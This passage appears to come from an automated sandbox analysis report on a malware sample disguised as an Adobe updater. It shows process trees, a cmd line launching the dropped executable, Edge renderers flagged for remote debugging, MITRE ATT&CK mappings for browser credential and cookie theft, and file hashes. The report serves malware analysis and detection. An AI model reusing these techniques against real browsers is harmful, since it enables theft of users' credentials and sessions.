        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --enable-blink-features=IdleDetection --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=4956,i,5820526066243649127,12638862669748880211,262144 --enable-features=msMetricsLogFastStartup,msSendMetricsLogOnClose --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version --mojo-platform-channel-handle=4964 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:2488
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --enable-blink-features=IdleDetection --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=4760,i,5820526066243649127,12638862669748880211,262144 --enable-features=msMetricsLogFastStartup,msSendMetricsLogOnClose --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version --mojo-platform-channel-handle=4576 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:4084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\AdobeUpdater\Updater.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:4872
- C:\Users\Admin\AppData\Local\AdobeUpdater\Updater.exe
  C:\Users\Admin\AppData\Local\AdobeUpdater\Updater.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3584

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:3368

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:752

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Modify Authentication Process

T1556

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Authentication Process

T1556

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\AdobeUpdater\Updater.exe

Filesize
2.8MB

MD5
2ee4087423cdcc9ef14519db15f627b6

SHA1
104667f7a390ce8d36a384365d6cca93dbff402f

SHA256
28828524d62ba090c2a5a558afee71c10d4b4db87c6d73e074698ef4395b8bdc

SHA512
9f68b9e4136cb60eb42729b58097b9185a833b77bb5a253d5492ba259f50cd1ec4ebda1f37184aada58c9f39eb6e02b48964e41e6deb5dc57a2305bcdd6f76eb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nmmhkkegccagdldgiimedpiccmgmieda\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nmmhkkegccagdldgiimedpiccmgmieda\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
80KB

MD5
02e3bcdb268e58c1f56d09b8a5d2e2ea

SHA1
eeeb4e376b6b7f34087e62dbefcef698ba2a80c9

SHA256
db3df94bd913ac1f7c8f1d586c7fbf4e70f570ef288e24847ed7080ef3ddb543

SHA512
5d1b41b751d4abd7d88cd321f2907e4f32b372989b58050202eb146dfd13828db05b79009a9f3cd5b62271405039cac01077ecf0118a8f86ace64c0e94e27f92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
049e5a246ed025dee243db0ba8e2984c

SHA1
15ec2d2b28dcfc17c1cfb5d0c13482d0706f942d

SHA256
33071ca42c472861a2fabd0f82f8b03ef0daaa6796b24b83f3df02587e4c3d12

SHA512
bc5f6fa6a8cae20ab40eae4552650d75f38ebb158c95288a79d9f332623bb507946513c39d19c00a5aee323df01f0f1a51c54594ef1c293289baf45f4ae2145b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
69KB

MD5
164a788f50529fc93a6077e50675c617

SHA1
c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48

SHA256
b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17

SHA512
ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
6KB

MD5
addd83d2642c2860d582e5d415acd5cd

SHA1
9cb3565fc2cf711b952930a5436b433373c86dbb

SHA256
a0c00eafd369bf01dec485b99a311b23971ebf4ede3584d9dda154e598060216

SHA512
b1dc6c6f72f23f60c790091c75058d7c166afa452bf2b7147b606332b34f451910181de143dc00b0cb8bdf8ef7c6bdae139dfef3d75af74b80abb13bcbba4ee9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
7KB

MD5
2216551c167b80a8c346ebfdd858d013

SHA1
db3259dde11a0ed4847b73b40ee7364019d60021

SHA256
76a0a84c1110fc0987de1401e9a0e1dfc1a137615252c524816a7d83dc928df5

SHA512
b7b5766d15576b1cc6258cbb215857cb9b4ab583a0917014288137e6b1d80935852407651454ddd0ea79acfa6eb54a8d40b175e9618d464f531e23636a1e40de

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpAC5D.tmp.bat

Filesize
265B

MD5
7ee5f89b76244f1278daf8c3f17d34b3

SHA1
cf61e522390204f6bf200e2aaac84555fcd8d933

SHA256
5e116d96f0a0f07f884a57c1d278a7ddc2f4dafa1b61f90214209a306d377035

SHA512
571c2aa901c6eac5e23210da33ed12f20152badec2f32c5c4e45800595b15f29e318102302194d76cf64e0abd4a74dbae51436e55377fdab3dde14f0bb045db8

Download Submit
memory/2168-60-0x0000023E6D1A0000-0x0000023E6D1AA000-memory.dmp

Filesize
40KB

Download
memory/2168-58-0x0000023E6D1E0000-0x0000023E6D1E8000-memory.dmp

Filesize
32KB

Download
memory/2168-19-0x0000023E6D020000-0x0000023E6D0D2000-memory.dmp

Filesize
712KB

Download
memory/2168-20-0x0000023E6D0D0000-0x0000023E6D0E4000-memory.dmp

Filesize
80KB

Download
memory/2168-23-0x0000023E6D100000-0x0000023E6D108000-memory.dmp

Filesize
32KB

Download
memory/2168-22-0x0000023E6C970000-0x0000023E6C984000-memory.dmp

Filesize
80KB

Download
memory/2168-21-0x0000023E6D120000-0x0000023E6D130000-memory.dmp

Filesize
64KB

Download
memory/2168-78-0x0000023E6D450000-0x0000023E6D472000-memory.dmp

Filesize
136KB

Download
memory/2168-61-0x0000023E6D3F0000-0x0000023E6D40E000-memory.dmp

Filesize
120KB

Download
memory/2168-59-0x0000023E6D180000-0x0000023E6D196000-memory.dmp

Filesize
88KB

Download
memory/2168-57-0x0000023E6D1B0000-0x0000023E6D1D6000-memory.dmp

Filesize
152KB

Download
memory/4168-13-0x00007FFFB41B0000-0x00007FFFB4C71000-memory.dmp

Filesize
10.8MB

Download
memory/4168-6-0x00000207E63A0000-0x00000207E63BA000-memory.dmp

Filesize
104KB

Download
memory/4168-0-0x00007FFFB41B3000-0x00007FFFB41B5000-memory.dmp

Filesize
8KB

Download
memory/4168-7-0x00000207809F0000-0x00000207809FA000-memory.dmp

Filesize
40KB

Download
memory/4168-5-0x00000207808F0000-0x00000207809E8000-memory.dmp

Filesize
992KB

Download
memory/4168-9-0x0000020780A10000-0x0000020780AB0000-memory.dmp

Filesize
640KB

Download
memory/4168-8-0x0000020780A00000-0x0000020780A0A000-memory.dmp

Filesize
40KB

Download
memory/4168-4-0x00000207E6370000-0x00000207E638E000-memory.dmp

Filesize
120KB

Download
memory/4168-3-0x00007FFFB41B0000-0x00007FFFB4C71000-memory.dmp

Filesize
10.8MB

Download
memory/4168-2-0x00000207FFDC0000-0x00000207FFE36000-memory.dmp

Filesize
472KB

Download
memory/4168-1-0x00000207E5C90000-0x00000207E5F58000-memory.dmp

Filesize
2.8MB

Download